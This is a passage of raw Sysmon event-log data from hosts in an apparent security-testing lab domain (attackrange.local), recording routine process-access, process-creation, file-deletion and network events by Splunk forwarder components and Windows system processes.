SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.913{0C1E0330-F4F6-60EB-7E79-00000000D001}2896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7D9232EF7EDB0C99A489C888735B62F,SHA256=703DA436F02680FF602191DF83A1F9D1044DC5A96B19AB7726A4E06B94F36E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.694{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3144A7F2F7959972567AD179CB344BF3,SHA256=D5711ECBE95985246DB00AA0317E96C79841F32A28853933AC68F9F525BA0CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8947C9C33E0D1F55DBF2E5DE494FB980,SHA256=6833486C69EB13E2E18EE86B3AE470C57FC24EBA77B9FC73AE3B2CF5D738A616,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:18.589{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51040-false10.0.1.12-8000- 10341000x80000000000000001049295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.194{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001049294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:26.194{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x8000000000000000807778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.240{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:26.241{0C1E0330-F4F6-60EB-7D79-00000000D001}224C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:27.792{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769F1AAFB3313D34CA29E0EC84D82AC0,SHA256=1A93F6C8E8E6F7F2C66DEC4193AEDC71EF1AD1B9AE26003B9F4A43871A260CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1BDB78993D6D5EF161BBB65DA121AEB,SHA256=39FE379D84DEA2D9159A83D45A6060A9C77515E8434EC48050B5A57C4BA856BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.694{0C1E0330-F4F7-60EB-7F79-00000000D001}12523404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4F7-60EB-7F79-00000000D001}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:27.569{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 